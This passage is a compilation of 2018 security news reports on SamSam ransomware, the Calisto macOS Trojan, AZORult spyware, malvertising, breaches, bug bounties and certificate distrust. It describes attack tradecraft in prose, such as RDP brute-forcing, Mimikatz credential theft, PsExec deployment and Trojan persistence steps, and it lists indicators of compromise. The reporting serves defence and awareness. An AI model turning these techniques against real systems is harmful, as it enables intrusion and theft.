Founded by Bauer and CTO Neil Murray in 2003, Mimecast went public in late 2015 at $10 per share, raising $78 million in gross proceeds. After the IPO, share value fell as low as $6.20 in January 2016. Since July 2016, however, share price has risen steadily, sitting at $36.37 at the time of writing.

Investors in Solebit include ClearSky Security, MassMutual Ventures and Glilot Capital Partners.


HP Launches Bug Bounty Program for Printers
1.8.2018 securityweek  
Vulnerebility

HP announced on Tuesday the launch of a bug bounty program for printers. The company is prepared to pay out up to $10,000 for serious vulnerabilities found in its products.

The initiative, which HP calls the industry’s first printer bug bounty program, was launched in partnership with crowdsourced security platform Bugcrowd.HP launches printer bug bounty program

The program is private, which means not anyone can participate. Researchers invited by HP have been instructed to focus on firmware-level vulnerabilities, including remote code execution, cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs.

The rewards range between $500 and $10,000 per flaw, but HP is not disclosing the specific payouts for each type of issue. Researchers can also earn a reward if they report a vulnerability previously discovered by HP itself – the company describes this as a “good faith payment.”

The bug bounty program currently covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

HP told SecurityWeek that currently it’s engaged with 34 researchers. The company says the program covers only endpoint devices – printer-related web domains are out of scope – with a focus on print firmware.

The company plans on expanding the program to its PC line soon, but it currently focuses on printers due to concerns that the technological advancements in this area make these types of devices an attractive target for malicious actors. HP noted that printers can not only provide access to the network that houses them, but they can also expose confidential documents.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP's Chief Technologist of Print Security. “HP is committed to engineering the most secure printers in the world.”


SamSam Ransomware: Patient, Persistent, Competent and Dangerous
1.8.2018 securityweek  
Ransomware

The SamSam ransomware has always been a bit different. Unlike many ransomware infections, its victims are targeted rather than random -- and the attacker establishes a presence on the victim network before beginning the encryption process.

Victims this year include the City of Atlanta, Allscripts, Adams Memorial Hospital, Colorado Department of Transportation and the Mississippi Valley State University. It could seem that SamSam targets health, education and government; but a new and detailed analysis of SamSam from Sophos shows this is not the case -- and its success rate is far higher than previously thought.

"Sophos have discovered that these three sectors account for fewer than half of the total number of organizations we believe have been victims of SamSam, and it's the private sector who have suffered the most (and disclosed the least)."

By following the money and tracking the Bitcoin payment wallets with help from Neutrino (a firm that specializes in tracking cryptocurrency flows), Sophos researchers have estimated that the SamSam attacker has netted more than $5.9 million dollars since version 1 (it is now at version 3) began being used in January 2016. The attacker is currently collecting an average of $300,000 per month. Sophos estimates that about 233 victims have paid a SamSam ransom.

The attacker is thought to be a single person working alone rather than a criminal or nation-state gang. He (or she) is proficient, although not perfect, in the English language; but probably comes from a country where English is not the first language. He does not boast about his exploits and has no known social media presence, where linguistic tells within has ransomware might provide clues to his identity. At this point, his identity and nationality are unknown.

Sophos researchers have tracked (PDF) the evolution of SamSam through its three versions. It shows a developer getting evermore proficient in his craft. The basic MO is to select the targets, possibly through publicly available search engines such as Shodan or Censys, to access the network, to elevate privilege and reconnoiter, and then encrypt everything he can access. The encryption itself is usually done overnight to reduce the chance of detection.

According to the researchers, version 3 usually affects entry through brute-forcing Windows RDP accounts. "While some may find this shocking," say the researchers, "a simple search on Shodan will reveal thousands of IP addresses accessible over port 3389, the default RDP port."

Once access to a domain user account is obtained, the attacker will typically use Mimikatz to harvest the credentials of the first domain admin to log on. This has been known on some occasions to take days, with the attacker simply waiting.

Armed with privileged access, the attacker starts to manually deploy the ransomware. First, he takes control of one of the victim's servers, which he uses as his command center. Then, he scans the network. If he can write a tiny text file to a computer's filesystem (called test.txt), the name of that file is added to a separate file stored on his command server and known as 'alive.txt'. "The attacker later uses this .txt file as a target list," report the researchers.

Deployment from the command server is usually done with the Sysinternals PsExec application, although the attacker has been known to switch to PowerAdmin's PaExec if the former is blocked. Once the attack is initiated, the attacker simply waits for payment.

One key element of SamSam is the extent to which stealth is used -- completely in keeping and supporting the attacker's low-profile approach to crime. "In version 3 of SamSam," say the reporters, "the general operation of the payload hasn't changed much since version 1, but the attackers have put significant efforts into creating a stealthier version of the malware."

One example of this is the order in which targeted files are encrypted -- anything smaller than 100 Mb immediately, and larger files in size order. SQL and MDF files (which are typically large and time-consuming to encrypt) are next; and finally, anything left that is not on an exclusion list. "This carefully curated approach enables the attacker to achieve a greater volume of encrypted files before the attack is spotted and interrupted."

Another example is the consistency with which the attacker deletes the files he uses one the device is encrypted, or if the attack is interrupted.

Payment is made in Bitcoin (BTC), and the attacker offers several initial options. Individual computers can be decrypted on payment of 0.8 BTC (as of July 2018). Full decryption -- regardless of the number of encrypted computers -- costs 7 BTC (around $40,000 at July 2018 exchange rates). Victims have 7 days to make payment; but there is at least one example of the victim being offered the option to reopen the countdown on payment of 0.5 BTC.

The bad news for victims is that there is no known way to recover SamSam encrypted files. The good news, if you can call it such, is that the attacker really does provide decryption, and even offers online support for those who have difficulties.

Sophos urges companies not to pay any ransom, but accepts the difficulties with SamSam. "Instead," say the researchers, "Sophos strongly recommends a comprehensive layered approach to security, to both avoid an initial attack, and enable system recovery through backups." However, they also note, "Securing an environment against a competent, persistent, and patient, human adversary is somewhat different from defending against the more conventional kinds of semi-automated, social engineering-driven threats more commonly seen in enterprise environments. And SamSam's own particularly damaging behavior sets it apart from many other ransomwares."


Mozilla Reinforces Commitment to Distrust Symantec Certificates
1.8.2018 securityweek Security 

Mozilla this week reaffirmed its commitment to distrust all Symantec certificates starting in late October 2018, when Firefox 63 is set to be released to the stable channel.

The browser maker had decided to remove trust in TLS/SSL certificates issued by the Certification Authority (CA) run by Symantec after a series of problems emerged regarding the wrongful issuance of such certificates.

Despite being one of the oldest and largest CAs, Symantec sold its certificate business to DigiCert after Internet companies, including Google and Mozilla, revealed plans to gradually remove trust in said certificates, even after DigiCert said it won’t repeat the same mistakes as Symantec.

The first step Mozilla took was to warn site owners about Symantec certificates issued before June 1, 2016, and encourage them to replace their TLS certificates.

Starting with Firefox 60, users see a warning when the browser encounters websites using certificates issued before June 1, 2016 that chain up to a Symantec root certificate.

According to Mozilla, less than 0.15% of websites were impacted by this change when Firefox 60 arrived in May. Most site owners were receptive and replaced their old certificates.

“The next phase of the consensus plan is to distrust any TLS certificate that chains up to a Symantec root, regardless of when it was issued […]. This change is scheduled for Firefox 63,” Mozilla’s Wayne Thayer notes in a blog post.

That browser release is currently planned for October 23, 2018 (it will arrive in Beta on September 5).

At the moment, around 3.5% of the top 1 million websites are still using Symantec certificates that will be impacted by the change. While the number is high, it represents a 20% improvement over the past two months, and Mozilla is confident that site owners will take action in due time.

“We strongly encourage website operators to replace any remaining Symantec TLS certificates immediately to avoid impacting their users as these certificates become distrusted in Firefox Nightly and Beta over the next few months,” Thayer concludes.

Google too is on track to distrust all Symantec certificates on October 23, 2018, when Chrome 70 is expected to land in the stable channel. Released in April, Chrome 66 has already removed trust in certificates issued by Symantec's legacy PKI before June 1, 2016.


DHS Unveils National Risk Management Center
1.8.2018 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of of Homeland Security (DHS) has launched The National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include, Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, Commander, U.S. Cyber Command and Director, National Security Agency General Paul M. Nakasone.

A live stream of the event can be watched online throughout the day.


Android Apps Carrying Windows Malware Yanked From Google Play
1.8.2018 securityweek   Android

Google recently removed 145 applications from Google Play after they were found to carry malicious Windows executables inside, Palo Alto Networks reveals.

Most of the infected applications, Palo Alto's researchers say, were uploaded to the application store between October and November 2017 and remained there for over half a year. Google removed all of them after being alerted on the issue.

While not representing a threat to the Android users who downloaded and installed them, the malicious code within these APKs is proof of the dangers posed by supply chain attacks: the software developers built these applications on compromised Windows systems.

Some of the infected Android applications had over 1000 downloads and 4-star ratings before being removed from Google Play.

The security researchers discovered that some of the infected APKs contained multiple malicious PE files at different locations, with different names. However, two malicious files were found embedded in most applications.

One of the files was present in 142 APKs, while the second had infected 21 APKs. The security firm also found 15 apps with both PE files inside, as well as some APKs with a number of other malicious PE files inside.

The researchers also note that one malicious PE file that infected most of the Android apps was a keylogger. The malicious program attempted to log keystrokes, including sensitive information like credit card numbers, social security numbers and passwords.

To appear legitimate, these files use fake names, including Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

When executed on Windows systems, the malicious PE files would create executable and hidden files in Windows system folders, including copies of themselves, would change Windows registry to auto-start after system restart, would attempt to sleep for long periods of time, and also showed suspicious network connection activities to IP address 87.98.185.184 via port 8829.

“Interestingly, we saw a mixture of infected and non-infected apps from the same developers. We believe the reason might be that developers used different development environment for different apps,” Palo Alto Networks says.

The malicious PE files cannot directly run on Android devices, but, if the APK is unpacked on a Windows machine and malicious code executed, the system becomes infected. As Palo Alto Networks points out, the situation could become much worse if the developers are infected with malicious files that can run on Android.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain,” the security firm concludes.


Medical System Notifies 1.4M Patients About Computer Breach
1.8.2018 securityweek   Incindent

A major Iowa hospital and medical clinic system has notified about 1.4 million patients and former patients about a computer breach that might have exposed their personal information.

UnityPoint Health officials say hackers used broke into the company's email system and could have obtained medical information.

UnityPoint's privacy officer, RaeAnn Isaacson, said Monday the company isn't aware of any misuse of patient information related to the incident. But she says the company is telling patients what UnityPoint is doing to address the situation and what patients can do to help protect their information.

The company says the hackers also might have obtained some patients' financial information.

UnityPoint say that after the problem was discovered May 31, it hired outside experts and notified the FBI.


SamSam Ransomware operators earned more than US$5.9 Million since late 2015
1.8.2018 securityaffairs 
Ransomware

The security experts from Sophos have published a report on the multimillion-dollar black market business for crooks, they analyzed the SamSam ransomware case as a case study.

The researchers that have tracked Bitcoin addresses managed by the crime gang discovered that crooks behind the SamSam ransomware had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

“In total, we have now identified 157 unique addresses which have received ransom payments as well as 89 addresses which have been used on ransom notes and sample files but, to date, have not received payments,” continues the report published by Sophos.

“By analyzing the payments, and comparing this with ransom notes at the time, we can estimate the number of individual victims who have chosen to pay at least some of the ransom amount stands at 233 as of July 19th 2018. With an estimated 1 new victim being attacked each day, we believe that roughly 1 in 4 victims pay at least some of the ransom. “

SamSam report 1
SamSam ransomware payments

The attackers deploy the SamSam ransomware manually by compromising RDP on the target machine, this aspect makes SamSam infections different from the ones associated with other ransomware that leverages spam campaigns or malvertising.

The attackers carry on brute-force attacks on RDP of the target system, some time they leverage credentials obtained from other data breaches typically offered for sale on the dark web.

Once compromised a system inside the targeted organization, the SamSam search for other machines to infect while stealing credentials.

When operators discover a potential target they manually deploy SamSam using tools like PSEXEC and batch scripts.

The following diagram shows the different steps of the latest SamSam variant for which the initial infection vector is still unclear.

SamSam new variant

Once infected the largest number of systems in the targeted organization, operators attempt to offer a complete clean up of the infected systems for a special price.

The highest estimate has been US$850,000 worth of bitcoin for the decryption keys.

The encryption process first involves most valuable data thanks to a multi-tiered priority system, SamSam ransomware doesn’t encrypt Windows system-related files.

Since its discovery, the SamSam ransomware targeted large organizations, including hospitals and educational institutions.

Sophos provides the following recommendations to secure the network of organizations against the SamSam ransomware:

regularly patch against known vulnerabilities for the applications and operating systems;
keep regular backups;
use multi-factor authentication;
restrict access to RDP(on port 3389);


Dixons Carphone Data Breach discovered in June affected 10 Million customers
1.8.2018 securityaffairs  Incindent

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, much more than the initial estimate.
Dixons Carphone, one of the largest European consumer electronics and telecommunication retailers, suffered a major data breach in 2017, but new data related to the incident have been shared.

The situation was worse than initially thought, the company announced on Monday that the security breach affected around 10 million customers, much more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company, it promptly launched an investigation and hired an external firm to shed the light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers including their names, addresses and email addresses last year.
In June it was estimated that hackers accessed data of 1.2 million people and 5.9 million payments cards used at Currys PC World and Dixons Travel were exposed.

Dixons Carphone assured its customers that no financial data was exposed (pin codes, card verification values and authentication data).

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”

Dixons Carphone hack

The company announced further security measure to protect its system and confirmed that all necessary action to lock put the attackers have been taken.
“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time that the company suffers a security breach, in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are anyway potentially exposed to phishing attacks and have to be vigilant


Ransomware attack against COSCO spread beyond its US network to Americas
1.8.2018 securityaffairs 
Ransomware

New revelations on the attack against COSCO confirm it was worse than initially thought, the ransomware spread beyond the US network.
Chinese shipping giant COSCO recently suffered a ransomware attack that disrupted some systems of the company in the United States.

The shipping company quickly isolates the systems to avoid propagation to other regions and started an internal investigation, the firm confirmed that the incident did not affect operations of the fleet.

“After the network security problem in the Americas has been detected, to protect the interests of our customers, we have taken proactive measures to isolate internal networks to carry out technical inspections on global scale.” COSCO said in an official statement. “With the reliable confirmation from the technical experts that the networks in all other regions are secure, the network applications were recovered at 16:00 (Beijing Time) on 25th July in all the regions except the Americas. As of now, all the business operations have been back to normal in the regions with network recovered.”

New revelations on the attack confirm it was worse than initially thought, the malicious code spread beyond the US network of the company and infected systems in other countries, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.

“Chinese shipping giant COSCO said a ransomware attack has spread beyond its US network to the broader Americas, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.” reported the CBR website.

“That’s according to maritime intelligence house Lloyds List, which has reported that customers were also said to be facing issues in the UK and Turkey.”

Due to local network breakdown within the America regions, local email and network telephone were not able to work properly at the moment of the attack.

The attack on the world’s largest shipping company by dry weight tonnage has taken out emails and phones.

The company published a list of alternative Yahoo! email addresses to its customers for ordinary communications.

Security experts warned that COSCO fleet could still be at risk following the attack.

“Although COSCO has been quick to respond to this hack, the virus may have been dormant for some time, so I would not be surprised if other systems – shore- and ship-based systems – have been breached. We strongly recommend to whoever discovered the attack to thoroughly verify the breach has been contained and has not infected any ships in the COSCO fleet.” Maritime cybersecurity specialists Naval Dome told IHS Fairplay:


The ransomware attack against COSCO doesn’t appear severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”


Calisto Trojan for macOS

31.7.2018 Kaspersky Apple
The first member of the Proton malware family?
An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

Propagation
We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as a cover which is still relevant.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

Backdoor Intego Mac Internet Security 2018
Unsigned Signed by Intego

It looks fairly convincing. The user is unlikely to notice the difference, especially if he has not used the app before.

Installation
As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from the Intego’s one — perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal when installing a program able to make changes to the system on macOS.

But after receiving the credentials, the program hangs slightly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan
With SIP enabled
Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using its child processes log and decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

Keychain storage data
Data extracted from the user login/password window
Information about the network connection
Data from Google Chrome: history, bookmarks, cookies
Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available
Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous chapter, but as the Trojan is not interrupted by SIP, it then:

Copies itself to /System/Library/ folder
Sets itself to launch automatically on startup
Unmounts and uninstalls its DMG image
Adds itself to Accessibility
Harvests additional information about the system
Enables remote access to the system
Forwards the harvested data to a C&C server
Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique for macOS, and is done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:

The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and an indicator of malicious activity for the antivirus. On the other hand, this method does not require user interaction.

An important feature of Calisto is getting remote access to the user system. To provide this, it:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one indication of the Trojan’s rawness.

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:

Attempt to contact the C&C server

Extra functions
Static analysis of Calisto revealed unfinished and unused additional functionality:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton
Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton was previously distributed under the guise of a Symantec antivirus product)
The Trojan sample contains the line “com.proton.calisto.plist”
Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain
Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software
MD5

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d


Advanced Malvertising Campaign Exploits Online Advertising Supply Chain
31.7.2018 securityweek
Exploit  Virus

Malvertising Campaign Steals Traffic From 10,000 Hacked WordPress Sites and Exploits the Online Advertising Supply Chain

Malvertising is neither a new nor insignificant threat -- nor is there any easy solution to stop it. It is the abuse of the online advertising industry to deliver malware disguised as or hidden within seemingly innocuous advertisements.

Researchers at Check Point have discovered what they describe as the infrastructure and methods used in a large ‘malvertising’ and banking Trojan campaign, which delivers malicious adverts to millions worldwide through the HiBids online advertising platform.

The campaign starts with a threat actor that Check Point describes as 'Master134'. He sold stolen web traffic from 10,000 hacked WordPress sites to, say the researchers, "AdsTerra, the real time bidding (RTB) ad platform, who then sold it to Resellers (ExoClick, AdKernel, EvoLeads and AdventureFeeds)."

The researchers told SecurityWeek, "The traffic is stolen from the compromised WordPress sites via a known exploit on that platform, which enables the actor to insert a redirection to his malicious infrastructure."

Once this traffic has passed through AdsTerra, the resellers sell it to the highest bidding advertiser. Unfortunately, the return value on malware distribution is (almost) immediate via malwares such as ransomwares, miners, and banking trojans. Due to the large return on those malwares, malicious actors can usually afford to out-bid legitimate publishers.

"In this way," say the researchers, "cyber criminals are abusing the online advertising ecosystem, using it to bid alongside legitimate advertisers, like Nike or Coca Cola, but placing higher bids in order to have the ad-networks select their malware-laden ads to display on thousands of publishers’ websites instead of clean, legitimate ads."

Check Point does not provide details of the malware being distributed through this particular campaign, nor any of the publications that receive and unwittingly transmit the malware to innocent visitors. It merely states, "The ads often contain malicious code that exploits unpatched vulnerabilities in browsers or browser plug-ins, such as Adobe’s Flash Player, so that the user gets infected by ransomware, keyloggers, and other types of malware simply by visiting a site hosting the malicious link."

Luis Corrons, security evangelist at Avast, told SecurityWeek that past malvertising campaigns "have affected some of the biggest news sites, such as The New York Times, Huffington Post, Forbes, The Daily Mail and more. In order to go undetected, some of these attacks just last a few seconds each wave, to make it harder to track the source of the infection. JavaScript Monero miner even got to YouTube through an ad network last January."

SecurityWeek asked AdsTerra for a comment on malvertising and the Check Point report, but we have so far received no reply to our email. Of the two telephone numbers we were able to find, one is a mobile number (supposedly in Singapore) that was switched off, while the other (supposedly in Gibraltar) just terminated. AdsTerra, according to its website, is headquartered in Limassol, Cyprus; while Europages lists an address in Gibraltar.

Online advertiser reviews, however, provide a glowing endorsement for the organization; with one saying that AdsTerra is particularly strong on popunder adverts. Popunders are among the sneakiest of advertisements. Rather than run the risk of being closed by the user as soon as it is seen, popunders open in a new window underneath the current browser window and remain unseen until the focus window is closed. "That’s one of the main streams of malvertising," Check Point told SecurityWeek.

There is no easy defense against malvertising. Ad blockers work, but more and more publishers are blocking access to their pages when they detect a blocker. Users must either pay a subscription for no adverts, accept they cannot view the page they want, or receive the adverts that could potentially contain malware or malicious links.

Greater responsibility -- perhaps even legal liability -- on the advertiser would help. Corrons suggests, "A content check should be performed by the ad network (on both the advertisements and the landing pages)." He would also like to see greater active monitoring, background checking on the publishers, and legal contracts with high fines if the content is not secure.

Little of this currently happens. "Due to the really fast transactions, and the sheer volume of advertisements, we believe that there is no real-time monitoring by humans," Check Point told SecurityWeek. "Resellers need to know that their customers are 'bad guys', but most of them preform no vetting of their customers."

Trusting to luck is not a good security defense; but it seems that the most many users can do against malvertising is use an ad blocker, maintain an up-to-date anti-virus solution, minimize local vulnerabilities with judicious patching -- and trust to luck when all else fails.


Samsung Patches Critical Vulnerabilities in SmartThings Hub

31.7.2018 securityweek Vulnerebility

Samsung has patched a series of critical vulnerabilities in its SmartThings Hub, which could be exploited to execute OS commands or other arbitrary code on vulnerable devices.

Designed as a central controller, the SmartThings Hub allows users monitor and manage smart home devices such as smart plugs, LED light bulbs, thermostats, cameras, and more. The controller runs a Linux-based firmware that allows for communications with Internet of Things devices deployed in the home using Ethernet, Zigbee, Z-Wave and Bluetooth.

An attacker able to leverage the discovered vulnerabilities could access sensitive information gathered by the connected devices, monitor and control devices within the home, and perform unauthorized activities. They could also unlock homes, monitor users via cameras inside homes, disable motion detectors, and even cause physical damage to appliances.

A total of 20 vulnerabilities impacting the SmartThings Hub were discovered by Talos researchers, who reveal that an attacker could “chain together three vulnerability classes that are present in the device to gain complete control of the device.” In a blog post, the researchers also describe different attack vectors an actor looking to exploit these vulnerability chains could use.

The vulnerabilities were found in Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. Samsung has already released patches for all flaws and users are advised to update their devices to stay secure (because Samsung pushes the updates automatically and user interaction should not be necessary).


A new sophisticated version of the AZORult Spyware appeared in the wild

31.7.2018 securityaffairs Virus

A new sophisticated version of the AZORult Spyware was spotted in the wild, it was involved in a large email campaign on July 18
Malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.

Attackers sent out thousands of messages targeting North America. The messages used employment-related subjects such as “About a role” and “Job Application,” while the malicious attached documents used file names in the format of “firstname.surname_resume.doc”.

“AZORult is a robust information stealer & downloader that Proofpoint researchers originally identified in 2016 as part of a secondary infection via the Chthonic banking Trojan. We have since observed many instances of AZORult dropped via exploit kits and in fairly regular email campaigns as both a primary and secondary payload.” reads the analysis published by ProofPoint.

“Recently, AZORult authors released a substantially updated version, improving both on its stealer and downloader functionality.”

AZORult spyware

AZORult is a data stealer that was first spotted in 2016 by Proofpoint that discovered it was it was part of a secondary infection via the Chthonic banking trojan. Later it was involved in many malspam attacks, but only now the authors released a substantially updated variant.

The latest version appears more sophisticated than previous ones, it implements the ability to steal histories from browsers (except IE and Edge), it includes a conditional loader that checks certain parameters before running the malicious code, and includes the support for Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC cryptocurrency wallets.

Below the full change log:

UPD v3.2
[+] Added stealing of history from browsers (except IE and Edge)
[+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
[+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from mysite.com, then download and run the file link[.]com/soft.exe. Also there is a rule “If there is data from cryptocurrency wallets” or “for all”
[+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
[+] Reduced the load in the admin panel.
[+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
[+] Added to the admin panel guest statistics
[+] Added to the admin panel a geobase
The conditional loader allows the attackers to infect only systems with specific characteristics, for example, it can check if certain desired cookies or saved passwords from specific sites are present on the victim’s machine,

After the malware has successfully connected the C&C server, it will send back to it the following files:

Next, after the initial exchange between the infected machine and the C&C server, the infected machine sends a report containing the stolen information. Again the report is XOR-encoded with the same 3-byte key; a portion of the decoded version is shown in Figure 5. The stolen information is organized into sections:

info: basic computer information such as Windows version and computer name
pwds: this section contains stolen passwords (not confirmed)
cooks: cookies or visited sites
file: contents of the cookies files and a file containing more system profiling information including machine ID, Windows version, computer name, screen resolution, local time, time zone, CPU model, CPU count, RAM, video card information, process listing of the infected machine, and software installed on the infected machine.
Once completed this phase, AZORult may download the next-stage payload.

The experts attributed the campaign to the TA516 threat actor that was focused on cryptocurrencies.

“As in legitimate software development, malware authors regularly update their software to introduce competitive new features, improve usability, and otherwise differentiate their products.” said ProofPoint.

“The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes. It is noteworthy that within a day of the new update appearing on underground forums, a prolific actor used the new version in a large email campaign, leveraging its new capabilities to distribute Hermes ransomware.”

Experts noticed that the infection process requests a significant users’ interaction to avoid antivirus. The victims would have to download the document that is password-protected, only after providing the password in a pop-up box included in the body of the email, the attack starts by requesting users to enable macros.

The macros download AZORult, which in turn downloads the Hermes 2.1 ransomware.

“AZORult malware, with its capabilities for credential and cryptocurrency theft, brings potential direct financial losses for individuals as well as the opportunity for actors to establish a beachhead in affected organizations,” concluded the experts.


Titan Security Keys- Google announced USB-based FIDO U2F Keys
31.7.2018 securityaffairs Crypto

Google will start offering Titan Security Keys to provide a further layer of security to its users and protect them from Phishing and MiTM attacks.
Google announced at Google Cloud Next ’18 convention in San Francisco the launch of the Titan Security Keys, a USB device that is used as part of its hardware-based two-factor authentication scheme for online accounts.

“Titan Security Key, available now to Cloud customers, and coming soon to the Google Store” states a blog post published by Google.

The hardware-based two-factor authentication scheme is designed to prevent account takeover with phishing and MiTM attacks when the attacker has gained access to user’s credentials.

Titan Security Keys

Google shared data related to the use of physical security keys by its personnel for months, the tech giant confirmed that none of its 85,000 employees that used the hardware-based two-factor authentication key has fallen victim to phishing attacks.

“We have had no reported or confirmed account takeovers since implementing security keys at Google” a Google spokesperson said.

“Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”

The authentication through the physical USB security key is more secure compared to other processes.

Titan Security Keys is based on the Fast IDentity Online (FIDO) Alliance, U2F (universal 2nd factor) protocol and was entirely designed by Google.

The Titan Security Key is available in both USB and Bluetooth versions, Google will offer it for sale in the Google’s online store within the next few months.

Log-in to Mobile devices will require a Bluetooth wireless device.

